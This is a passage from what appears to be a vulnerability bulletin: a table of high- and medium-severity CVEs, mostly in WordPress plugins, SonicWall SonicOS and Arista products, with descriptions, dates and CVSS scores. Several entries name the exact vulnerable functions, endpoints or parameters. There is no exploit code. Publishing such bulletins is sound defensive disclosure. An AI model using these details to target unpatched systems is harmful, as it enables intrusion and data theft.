Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Roninwp FAT Event Lite allows PHP Local File Inclusion.This issue affects FAT Event Lite: from n/a through 1.1. | 2025-01-09 | 8.1 | CVE-2025-22508 |
| Roya Khosravi--SingSong |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Roya Khosravi SingSong allows Stored XSS.This issue affects SingSong: from n/a through 1.2. | 2025-01-07 | 7.1 | CVE-2025-22522 |
| RTO GmbH--DynamicTags |
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in RTO GmbH DynamicTags allows Blind SQL Injection.This issue affects DynamicTags: from n/a through 1.4.0. | 2025-01-07 | 8.5 | CVE-2025-22348 |
| Scott Farrell--wp Hosting Performance Check |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Scott Farrell wp Hosting Performance Check allows Reflected XSS.This issue affects wp Hosting Performance Check: from n/a through 2.18.8. | 2025-01-09 | 7.1 | CVE-2025-22521 |
| Scott Nell--Uptime Robot |
Cross-Site Request Forgery (CSRF) vulnerability in Scott Nellé Uptime Robot allows Stored XSS.This issue affects Uptime Robot: from n/a through 0.1.3. | 2025-01-07 | 7.1 | CVE-2025-22582 |
| scriptsbundle--AdForest |
The AdForest theme for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 5.1.6. This is due to the plugin not properly validating a user's identity prior to updating their password through the adforest_reset_password() function. This makes it possible for unauthenticated attackers to change arbitrary user's passwords, including administrators, and leverage that to gain access to their account. | 2025-01-08 | 9.8 | CVE-2024-11350 |
| Sebastian Orellana--Emailing Subscription |
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Sebastian Orellana Emailing Subscription allows Blind SQL Injection.This issue affects Emailing Subscription: from n/a through 1.4.1. | 2025-01-09 | 9.3 | CVE-2025-22540 |
| seobeginner--SEO LAT Auto Post |
The SEO LAT Auto Post plugin for WordPress is vulnerable to file overwrite due to a missing capability check on the remote_update AJAX action in all versions up to, and including, 2.2.1. This makes it possible for unauthenticated attackers to overwrite the seo-beginner-auto-post.php file which can be leveraged to achieve remote code execution. | 2025-01-07 | 9.8 | CVE-2024-12252 |
| Service Shogun--Ach Invoice App |
Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Service Shogun Ach Invoice App allows PHP Local File Inclusion.This issue affects Ach Invoice App: from n/a through 1.0.1. | 2025-01-07 | 7.5 | CVE-2025-22364 |
| silabs.com--WiSeConnect SDK |
In SiWx91x devices, the SHA2/224 algorithm returns a hash of 256 bits instead of 224 bits. This incorrect hash length triggers a software assertion, which subsequently causes a Denial of Service (DoS). If a watchdog is implemented, device will restart after watch dog expires. If watchdog is not implemented, device can be recovered only after a hard reset | 2025-01-07 | 7.5 | CVE-2024-8361 |
| silverplugins217--Multiple Shipping And Billing Address For Woocommerce |
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in silverplugins217 Multiple Shipping And Billing Address For Woocommerce allows SQL Injection.This issue affects Multiple Shipping And Billing Address For Woocommerce: from n/a through 1.2. | 2025-01-07 | 9.3 | CVE-2024-56290 |
| Simple Plugins--Target Notifications |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Simple Plugins Target Notifications allows Reflected XSS.This issue affects Target Notifications: from n/a through 1.1.1. | 2025-01-07 | 7.1 | CVE-2025-22357 |
| Smackcoders--WP Ultimate Exporter |
Improper Control of Generation of Code ('Code Injection') vulnerability in Smackcoders WP Ultimate Exporter allows PHP Remote File Inclusion.This issue affects WP Ultimate Exporter: from n/a through 2.9.1. | 2025-01-07 | 9.1 | CVE-2024-56278 |
| SMSA Express--SMSA Shipping |
Path Traversal vulnerability in SMSA Express SMSA Shipping allows Path Traversal.This issue affects SMSA Shipping: from n/a through 2.3. | 2025-01-07 | 8.6 | CVE-2024-49249 |
| sonalsinha21--SKT Page Builder |
The SKT Page Builder plugin for WordPress is vulnerable to arbitrary file uploads due to a missing capability check on the 'addLibraryByArchive' function in all versions up to, and including, 4.6. This makes it possible for authenticated attackers, with subscriber-level access and above, to upload arbitrary files that make remote code execution possible. | 2025-01-09 | 8.8 | CVE-2024-12848 |
| SonicWall--SonicOS |
SSL-VPN MFA Bypass in SonicWALL SSL-VPN can arise in specific cases due to the separate handling of UPN (User Principal Name) and SAM (Security Account Manager) account names when integrated with Microsoft Active Directory, allowing MFA to be configured independently for each login method and potentially enabling attackers to bypass MFA by exploiting the alternative account name. | 2025-01-09 | 9.1 | CVE-2024-12802 |
| SonicWall--SonicOS |
A post-authentication stack-based buffer overflow vulnerability in SonicOS management allows a remote attacker to crash a firewall and potentially leads to code execution. | 2025-01-09 | 9.8 | CVE-2024-12803 |
| SonicWall--SonicOS |
A post-authentication format string vulnerability in SonicOS management allows a remote attacker to crash a firewall and potentially leads to code execution. | 2025-01-09 | 9.8 | CVE-2024-12805 |
| SonicWall--SonicOS |
Use of Cryptographically Weak Pseudo-Random Number Generator (PRNG) in the SonicOS SSLVPN authentication token generator that, in certain cases, can be predicted by an attacker potentially resulting in authentication bypass. | 2025-01-09 | 9.8 | CVE-2024-40762 |
| SonicWall--SonicOS |
An Integer-based buffer overflow vulnerability in the SonicOS via IPSec allows a remote attacker in specific conditions to cause Denial of Service (DoS) and potentially execute arbitrary code by sending a specially crafted IKEv2 payload. | 2025-01-09 | 9.8 | CVE-2024-40765 |
| SonicWall--SonicOS |
An Improper Authentication vulnerability in the SSLVPN authentication mechanism allows a remote attacker to bypass authentication. | 2025-01-09 | 9.8 | CVE-2024-53704 |
| SonicWall--SonicOS |
A post-authentication absolute path traversal vulnerability in SonicOS management allows a remote attacker to read an arbitrary file. | 2025-01-09 | 7.5 | CVE-2024-12806 |
| SonicWall--SonicOS |
A Server-Side Request Forgery vulnerability in the SonicOS SSH management interface allows a remote attacker to establish a TCP connection to an IP address on any port when the user is logged in to the firewall. | 2025-01-09 | 7.5 | CVE-2024-53705 |
| SonicWall--SonicOS |
A vulnerability in the Gen7 SonicOS Cloud platform NSv, allows a remote authenticated local low-privileged attacker to elevate privileges to `root` and potentially lead to code execution. | 2025-01-09 | 7.8 | CVE-2024-53706 |
| SSL Wireless--SSL Wireless SMS Notification |
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in SSL Wireless SSL Wireless SMS Notification allows SQL Injection.This issue affects SSL Wireless SMS Notification: from n/a through 3.5.0. | 2025-01-07 | 9.3 | CVE-2024-56284 |
| StarCitizenTools--mediawiki-extensions-TabberNeue |
TabberNeue is a MediaWiki extension that allows the wiki to create tabs. Prior to 2.7.2, TabberTransclude.php doesn't escape the user-supplied page name when outputting, so an XSS payload as the page name can be used here. This vulnerability is fixed in 2.7.2. | 2025-01-06 | 8.6 | CVE-2025-21612 |
| stonith404--pingvin-share |
Pingvin Share is a self-hosted file sharing platform and an alternative for WeTransfer. This vulnerability allows an authenticated or unauthenticated (if anonymous shares are allowed) user to overwrite arbitrary files on the server, including sensitive system files, via HTTP POST requests. The issue has been patched in version 1.4.0. | 2025-01-08 | 9.8 | CVE-2025-22137 |
| StylemixThemes--Cost Calculator Builder PRO |
The Cost Calculator Builder PRO plugin for WordPress is vulnerable to blind time-based SQL Injection via the 'data' parameter in all versions up to, and including, 3.2.15 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2025-01-08 | 7.5 | CVE-2024-11939 |
| Tenda--AC6 |
A vulnerability classified as critical has been found in Tenda AC6 15.03.05.16. Affected is the function GetParentControlInfo of the file /goform/GetParentControlInfo. The manipulation of the argument src leads to stack-based buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. Other parameters might be affected as well. | 2025-01-09 | 8.8 | CVE-2025-0349 |
| tgstation--tgstation-server |
tgstation-server is a production scale tool for BYOND server management. Prior to 6.12.3, roles used to authorize API methods were incorrectly OR'd instead of AND'ed with the role used to determine if a user was enabled. This allows enabled users access to most, but not all, authorized actions regardless of their permissions. Notably, the WriteUsers right is unaffected so users may not use this bug to permanently elevate their account permissions. The fix is release in tgstation-server-v6.12.3. | 2025-01-06 | 8.8 | CVE-2025-21611 |
| ThemeGlow--JobBoard Job listing |
Unrestricted Upload of File with Dangerous Type vulnerability in ThemeGlow JobBoard Job listing allows Upload a Web Shell to a Web Server.This issue affects JobBoard Job listing: from n/a through 1.2.6. | 2025-01-07 | 10 | CVE-2024-43243 |
| themesawesome--School Management System SakolaWP |
The School Management System - SakolaWP plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 1.0.8. This is due to the registration function not properly limiting what roles a user can register as. This makes it possible for unauthenticated attackers to register as an administrative user. | 2025-01-07 | 9.8 | CVE-2024-12470 |
| themescoder--Themes Coder Create Android & iOS Apps For Your Woocommerce Site |
The Themes Coder - Create Android & iOS Apps For Your Woocommerce Site plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 1.3.4. This is due to the plugin not properly validating a user's identity prior to updating their password through the update_user_profile() function. This makes it possible for unauthenticated attackers to change arbitrary user's passwords, including administrators, and leverage that to gain access to their account. | 2025-01-07 | 9.8 | CVE-2024-12402 |
| theperfectwedding--ThePerfectWedding.nl Widget |
The ThePerfectWedding.nl Widget plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.8. This is due to missing or incorrect nonce validation on the 'update_option' function. This makes it possible for unauthenticated attackers to update the 'tpwKey' option with stored cross-site scripting via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2025-01-07 | 8.8 | CVE-2024-12322 |
| Tobias Spiess--TS Comfort DB |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Tobias Spiess TS Comfort DB allows Reflected XSS.This issue affects TS Comfort DB: from n/a through 2.0.7. | 2025-01-09 | 7.1 | CVE-2025-22345 |
| Tock--Tock Widget |
Cross-Site Request Forgery (CSRF) vulnerability in Tock Tock Widget allows Cross Site Request Forgery.This issue affects Tock Widget: from n/a through 1.1. | 2025-01-07 | 7.1 | CVE-2025-22520 |
| traveller11--Google Maps Travel Route |
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in traveller11 Google Maps Travel Route allows SQL Injection.This issue affects Google Maps Travel Route: from n/a through 1.3.1. | 2025-01-09 | 8.5 | CVE-2025-22537 |
| Tripetto--WordPress form builder plugin for contact forms, surveys and quizzes Tripetto |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Tripetto WordPress form builder plugin for contact forms, surveys and quizzes - Tripetto allows Stored XSS.This issue affects WordPress form builder plugin for contact forms, surveys and quizzes - Tripetto: from n/a through 8.0.5. | 2025-01-09 | 7.1 | CVE-2025-22295 |
| Unknown--WordPress Auction Plugin |
The WordPress Auction Plugin WordPress plugin through 3.7 does not sanitize and escape a parameter before using it in a SQL statement, allowing editors and above to perform SQL injection attacks | 2025-01-07 | 9.8 | CVE-2024-8855 |
| vivo--Health |
The health module has insufficient restrictions on loading URLs, which may lead to some information leakage. | 2025-01-08 | 7.5 | CVE-2024-13173 |
| vivo--MinigameCenter |
The MinigameCenter module has insufficient restrictions on loading URLs, which may lead to some information leakage. | 2025-01-08 | 7.5 | CVE-2024-13185 |
| vivo--MinigameCenter |
The MinigameCenter module has insufficient restrictions on loading URLs, which may lead to some information leakage. | 2025-01-08 | 7.5 | CVE-2024-13186 |
| wander-chu--SpringBoot-Blog |
A vulnerability, which was classified as critical, was found in wander-chu SpringBoot-Blog 1.0. This affects the function preHandle of the file src/main/java/com/my/blog/website/interceptor/BaseInterceptor.java of the component HTTP POST Request Handler. The manipulation leads to improper access controls. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-01-09 | 7.3 | CVE-2024-13200 |
| webdevmattcrom--GiveWP Donation Plugin and Fundraising Platform |
The GiveWP - Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.19.2 via deserialization of untrusted input from the donation form like 'firstName'. This makes it possible for unauthenticated attackers to inject a PHP Object. The additional presence of a POP chain allows attackers to delete arbitrary files on the server that makes remote code execution possible. Please note this was only partially patched in 3.19.3, a fully sufficient patch was not released until 3.19.4. However, another CVE was assigned by another CNA for version 3.19.3 so we will leave this as affecting 3.19.2 and before. We have recommended the vendor use JSON encoding to prevent any further deserialization vulnerabilities from being present. | 2025-01-11 | 9.8 | CVE-2024-12877 |
| WOOEXIM.COM--WOOEXIM |
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in WOOEXIM.COM WOOEXIM allows SQL Injection.This issue affects WOOEXIM: from n/a through 5.0.0. | 2025-01-07 | 7.6 | CVE-2025-22533 |
| WordPress --Wizhi Multi Filters by Wenprise |
Cross-Site Request Forgery (CSRF) vulnerability in WordPress 智库 Wizhi Multi Filters by Wenprise allows Stored XSS.This issue affects Wizhi Multi Filters by Wenprise: from n/a through 1.8.6. | 2025-01-07 | 7.1 | CVE-2025-22336 |
| WP Swings--Gift Cards for WooCommerce Pro |
The Ultimate Gift Cards for WooCommerce - Create WooCommerce Gift Cards, Gift Vouchers, Redeem & Manage Digital Gift Coupons. Offer Gift Certificates, Schedule Gift Cards, and Use Advance Coupons With Personalized Templates plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on several REST API endpoints such as /wp-json/gifting/recharge-giftcard in all versions up to, and including, 3.0.6. This makes it possible for unauthenticated attackers to recharge a gift card balance, without making a payment along with reducing gift card balances without purchasing anything. | 2025-01-08 | 7.5 | CVE-2024-11423 |
| wpchill--Modula Image Gallery |
The Modula Image Gallery plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the zip upload functionality in all versions up to, and including, 2.11.10. This makes it possible for authenticated attackers, with Author-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible. | 2025-01-08 | 8.8 | CVE-2024-12853 |
| wpextended--The Ultimate WordPress Toolkit WP Extended |
The Ultimate WordPress Toolkit - WP Extended plugin for WordPress is vulnerable to Remote Code Execution in version 3.0.11. This is due to a missing capability check on the 'wpext_handle_snippet_update' function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to execute code on the server providing an admin has created at least one code snippet. | 2025-01-08 | 8.8 | CVE-2024-11816 |
| wpextended--The Ultimate WordPress Toolkit WP Extended |
The The Ultimate WordPress Toolkit - WP Extended plugin for WordPress is vulnerable to unauthorized modification and retrieval of data due to a missing capability check on several functions in all versions up to, and including, 3.0.11. This makes it possible for authenticated attackers, with subscriber-level access and above, to import and activate arbitrary code snippets along with | 2025-01-08 | 7.4 | CVE-2024-11916 |
| wpguruin--Error Log Viewer By WP Guru |
The Error Log Viewer By WP Guru plugin for WordPress is vulnerable to Arbitrary File Read in all versions up to, and including, 1.0.1.3 via the wp_ajax_nopriv_elvwp_log_download AJAX action. This makes it possible for unauthenticated attackers to read the contents of arbitrary files on the server, which can contain sensitive information. | 2025-01-07 | 7.5 | CVE-2024-12849 |
| WpIndeed--Ultimate Learning Pro |
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in WpIndeed Ultimate Learning Pro allows SQL Injection.This issue affects Ultimate Learning Pro: from n/a through 3.9. | 2025-01-07 | 7.6 | CVE-2025-22350 |
| WPMagic--News Publisher Autopilot |
Cross-Site Request Forgery (CSRF) vulnerability in WPMagic News Publisher Autopilot allows Cross Site Request Forgery.This issue affects News Publisher Autopilot: from n/a through 2.1.4. | 2025-01-07 | 7.1 | CVE-2025-22557 |
| WPSpins--Post/Page Copying Tool |
Insertion of Sensitive Information Into Sent Data vulnerability in WPSpins Post/Page Copying Tool allows Retrieve Embedded Sensitive Data.This issue affects Post/Page Copying Tool: from n/a through 2.0.0. | 2025-01-07 | 7.5 | CVE-2024-56300 |
| wpwebinarsystem--WordPress Webinar Plugin WebinarPress |
The WordPress Webinar Plugin - WebinarPress plugin for WordPress is vulnerable to arbitrary file creation due to a missing capability check on the 'sync-import-imgs' function and missing file type validation in all versions up to, and including, 1.33.24. This makes it possible for authenticated attackers, with subscriber-level access and above, to create arbitrary files that can lead to remote code execution. | 2025-01-08 | 8.8 | CVE-2024-11270 |
| wpwebinarsystem--WordPress Webinar Plugin WebinarPress |
The WordPress Webinar Plugin - WebinarPress plugin for WordPress is vulnerable to modification of data due to a missing capability check on several functions in all versions up to, and including, 1.33.24. This makes it possible for authenticated attackers, with subscriber-level access and above, to modify webinars. | 2025-01-08 | 8.8 | CVE-2024-11271 |
| Yamna Khawaja--Mailing Group Listserv |
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Yamna Khawaja Mailing Group Listserv allows SQL Injection.This issue affects Mailing Group Listserv: from n/a through 2.0.9. | 2025-01-09 | 7.6 | CVE-2025-22527 |
| Yamna Khawaja--Mailing Group Listserv |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Yamna Khawaja Mailing Group Listserv allows Reflected XSS.This issue affects Mailing Group Listserv: from n/a through 2.0.9. | 2025-01-09 | 7.1 | CVE-2025-22595 |
| zauberzeug--nicegui |
NiceGUI is an easy-to-use, Python-based UI framework. Prior to 2.9.1, authenticating with NiceGUI logged in the user for all browsers, including browsers in incognito mode. This vulnerability is fixed in 2.9.1. | 2025-01-06 | 7.5 | CVE-2025-21618 |
| ZeroWdd--myblog |
A vulnerability classified as critical has been found in ZeroWdd myblog 1.0. This affects an unknown part of the file src/main/java/com/wdd/myblog/config/MyBlogMvcConfig.java. The manipulation leads to permission issues. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. | 2025-01-08 | 7.3 | CVE-2024-13189 |
| ZettaScale--DDS |
An attacker can arbitrarily craft malicious DDS Participants (or ROS 2 Nodes) with valid certificates to compromise and get full control of the attacked secure DDS databus system by exploiting vulnerable attributes in the configuration of PKCS#7 certificate's validation. This is caused by a non-compliant implementation of permission document verification used by some DDS vendors. Specifically, an improper use of the OpenSSL PKCS7_verify function used to validate S/MIME signatures. | 2025-01-09 | 8.2 | CVE-2023-24011 |
Medium Vulnerabilities
| Primary Vendor -- Product |
Description | Published | CVSS Score | Source Info |
|---|---|---|---|---|
| 1clickdesigns--ClickDesigns |
The ClickDesigns plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'clickdesigns_add_api' and the 'clickdesigns_remove_api' functions in all versions up to, and including, 1.8.0. This makes it possible for unauthenticated attackers to modify or remove the plugin's API key. | 2025-01-07 | 5.3 | CVE-2024-12559 |
| 3dvieweronline--3DVieweronline |
The 3DVieweronline plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's '3Dvo-model' shortcode in all versions up to, and including, 2.2.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-01-09 | 6.4 | CVE-2024-12514 |
| 4wpbari--Qr Code and Barcode Scanner Reader |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in 4wpbari Qr Code and Barcode Scanner Reader allows Stored XSS.This issue affects Qr Code and Barcode Scanner Reader: from n/a through 1.0.0. | 2025-01-09 | 6.5 | CVE-2025-22819 |
| 5 Star Plugins--Pretty Simple Popup Builder |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in 5 Star Plugins Pretty Simple Popup Builder allows Stored XSS.This issue affects Pretty Simple Popup Builder: from n/a through 1.0.9. | 2025-01-07 | 5.9 | CVE-2024-56298 |
| a3rev--Compare Products for WooCommerce |
The Compare Products for WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 's_feature' parameter in all versions up to, and including, 3.2.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2025-01-07 | 6.1 | CVE-2024-12435 |
| AazzTech--WP Cookie |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in AazzTech WP Cookie allows Stored XSS.This issue affects WP Cookie: from n/a through 1.0.0. | 2025-01-07 | 5.9 | CVE-2025-22578 |
| ABB--AC500 V3 |
An attacker who successfully exploited these vulnerabilities could grant read access to files. A vulnerability exists in the AC500 V3 version mentioned. A successfully authenticated attacker can use this vulnerability to read system wide files and configuration All AC500 V3 products (PM5xxx) with firmware version earlier than 3.8.0 are affected by this vulnerability. | 2025-01-07 | 4.3 | CVE-2024-12429 |
| add-ons.org--Email Templates Customizer for WordPress Drag And Drop Email Templates Builder YeeMail |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in add-ons.org Email Templates Customizer for WordPress - Drag And Drop Email Templates Builder - YeeMail allows Stored XSS.This issue affects Email Templates Customizer for WordPress - Drag And Drop Email Templates Builder - YeeMail: from n/a through 2.1.4. | 2025-01-09 | 6.5 | CVE-2025-22802 |
| AddFunc--AddFunc Mobile Detect |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in AddFunc AddFunc Mobile Detect allows Stored XSS.This issue affects AddFunc Mobile Detect: from n/a through 3.1. | 2025-01-07 | 6.5 | CVE-2025-22550 |
| AIpost--AI WP Writer |
Cross-Site Request Forgery (CSRF) vulnerability in AIpost AI WP Writer allows Cross Site Request Forgery.This issue affects AI WP Writer: from n/a through 3.8.4.4. | 2025-01-07 | 4.3 | CVE-2025-22297 |
| aiwp--Elementor Addons AI Addons 70 Widgets, Premium Templates, Ultimate Elements |
The Elementor Addons AI Addons - 70 Widgets, Premium Templates, Ultimate Elements plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 2.2.1 via the render function due to insufficient restrictions on which templates can be included. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract data from private or draft templates that they should not have access to. | 2025-01-07 | 4.3 | CVE-2024-12140 |
| akshay-menariya--Export Import Menus |
The Export Import Menus plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the dsp_export_import_menus() function in all versions up to, and including, 1.9.1. This makes it possible for unauthenticated attackers to export menu data and settings. | 2025-01-07 | 5.3 | CVE-2024-10866 |
| alanperfectportal--Perfect Portal Widgets |
The Perfect Portal Widgets plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'perfect_portal_intake_form' shortcode in all versions up to, and including, 3.0.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-01-11 | 6.4 | CVE-2024-12527 |
| Ali Ali--Alpha Price Table For Elementor |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Ali Ali Alpha Price Table For Elementor allows DOM-Based XSS.This issue affects Alpha Price Table For Elementor: from n/a through 1.0.8. | 2025-01-07 | 6.5 | CVE-2025-22500 |
| amitrotem--Deliver via Shipos for WooCommerce |
The Deliver via Shipos for WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'dvsfw_bulk_label_url' parameter in all versions up to, and including, 2.1.7 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2025-01-09 | 6.1 | CVE-2024-12222 |
| andersyogo--YOGO Booking |
The YOGO Booking plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'yogo-calendar' shortcode in all versions up to, and including, 1.6.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-01-07 | 6.4 | CVE-2024-12462 |
| appizy--App Embed |
The App Embed plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'appizy' shortcode in all versions up to, and including, 2.3.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-01-07 | 6.4 | CVE-2024-11749 |
| Arefly--WP Header Notification |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Arefly WP Header Notification allows Stored XSS.This issue affects WP Header Notification: from n/a through 1.2.7. | 2025-01-07 | 5.9 | CVE-2025-22579 |
| Arista Networks--Arista Edge Threat Management |
Expired and unusable administrator authentication tokens can be revealed by units that have timed out from ETM access | 2025-01-10 | 6.8 | CVE-2024-47517 |
| Arista Networks--Arista Edge Threat Management |
Specially constructed queries targeting ETM could discover active remote access sessions | 2025-01-10 | 6.4 | CVE-2024-47518 |
| Arista Networks--Arista Edge Threat Management |
A user with administrator privileges is able to retrieve authentication tokens | 2025-01-10 | 6.6 | CVE-2024-9133 |
| Arista Networks--CloudVision Appliance |
On Arista CloudVision Appliance (CVA) affected releases running on appliances that support hardware disk encryption (DCA-350E-CV only), the disk encryption might not be successfully performed. This results in the disks remaining unsecured and data on them | 2025-01-10 | 4.6 | CVE-2024-7142 |
| Arista Networks--EOS |
On affected platforms running Arista EOS, a specially crafted packet with incorrect VLAN tag might be copied to CPU, which may cause incorrect control plane behavior related to the packet, such as route flaps, multicast routes learnt, etc. | 2025-01-10 | 6.5 | CVE-2024-5872 |
| Arista Networks--EOS |
On affected platforms running Arista EOS with SNMP configured, if "snmp-server transmit max-size" is configured, under some circumstances a specially crafted packet can cause the snmpd process to leak memory. This may result in the snmpd process being terminated (causing SNMP requests to time out until snmpd is restarted) and memory pressure for other processes on the switch. Increased memory pressure can cause processes other than snmpd to be at risk for unexpected termination as well. | 2025-01-10 | 4.3 | CVE-2024-7095 |
| Arista Networks--EOS-Policy Based Routing (PBR) |
On affected platforms running Arista EOS with one of the following features configured to redirect IP traffic to a next hop: policy-based routing (PBR), BGP Flowspec, or interface traffic policy -- certain IP traffic such as IPv4 packets with IP options may bypass the feature's set nexthop action and be slow-path forwarded (FIB routed) by the kernel as the packets are trapped to the CPU instead of following the redirect action's destination. | 2025-01-10 | 5.8 | CVE-2024-6437 |
| arrowplugins--Popup MailChimp, GetResponse and ActiveCampaign Intergrations |
The Popup - MailChimp, GetResponse and ActiveCampaign Intergrations plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the 'upc_delete_db_data' AJAX action in all versions up to, and including, 3.2.6. This makes it possible for unauthenticated attackers to delete the DB data for the plugin. | 2025-01-07 | 5.3 | CVE-2024-12158 |
| arsdeveloper--ARS Affiliate Page Plugin |
The ARS Affiliate Page Plugin plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'utm_keyword' parameter in all versions up to, and including, 2.0.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2025-01-07 | 6.1 | CVE-2024-12098 |
| artbees--Jupiter X Core |
The Jupiter X Core plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the export_popup_action() function in all versions up to, and including, 4.8.5. This makes it possible for unauthenticated attackers to export popup templates. | 2025-01-07 | 5.3 | CVE-2024-12316 |
| artbees--Jupiter X Core |
The Jupiter X Core plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the sync_libraries() function in all versions up to, and including, 4.8.5. This makes it possible for authenticated attackers, with Subscriber-level access and above, to sync libraries | 2025-01-07 | 4.3 | CVE-2024-12033 |
| aThemeArt--Store Commerce |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in aThemeArt Store Commerce allows DOM-Based XSS.This issue affects Store Commerce: from n/a through 1.2.3. | 2025-01-07 | 6.5 | CVE-2025-22339 |
| Axis Communications AB--AXIS Camera Station Pro |
Seth Fogie, member of AXIS Camera Station Pro Bug Bounty Program, has found that it is possible for an authenticated malicious client to tamper with audit log creation in AXIS Camera Station, or perform a Denial-of-Service attack on the AXIS Camera Station server using maliciously crafted audit log entries. Axis has released a patched version for the highlighted flaw. Please refer to the Axis security advisory for more information and solution. | 2025-01-07 | 6.3 | CVE-2024-7696 |
| bailuk--AAT |
AAT (Another Activity Tracker) is a GPS-tracking application for tracking sportive activities, with emphasis on cycling. Versions lower than v1.26 of AAT are vulnerable to data exfiltration from malicious apps installed on the same device. | 2025-01-06 | 5.5 | CVE-2025-21615 |
| bandido--Woo Ukrposhta |
The Woo Ukrposhta plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'order', 'post', and 'idd' parameters in all versions up to, and including, 1.17.11 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2025-01-07 | 6.1 | CVE-2024-12049 |
| bdthemes--Element Pack Elementor Addons (Header Footer, Template Library, Dynamic Grid, Carousel and Remote Arrows) |
The Element Pack Elementor Addons (Header Footer, Template Library, Dynamic Grid, Carousel and Remote Arrows) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the custom_attributes parameter of the Cookie Consent Widget in all versions up to, and including, 5.10.14 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-01-08 | 6.4 | CVE-2024-12851 |
| Beautiful Templates--ST Gallery WP |
Missing Authorization vulnerability in Beautiful Templates ST Gallery WP allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects ST Gallery WP: from n/a through 1.0.8. | 2025-01-07 | 5.4 | CVE-2025-22543 |
| Ben Huson--List Pages at Depth |
